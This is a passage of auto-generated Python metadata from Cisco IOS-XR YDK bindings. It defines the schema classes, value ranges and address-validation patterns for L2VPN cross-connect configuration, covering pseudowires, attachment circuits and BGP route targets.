'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' cross connect description Name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
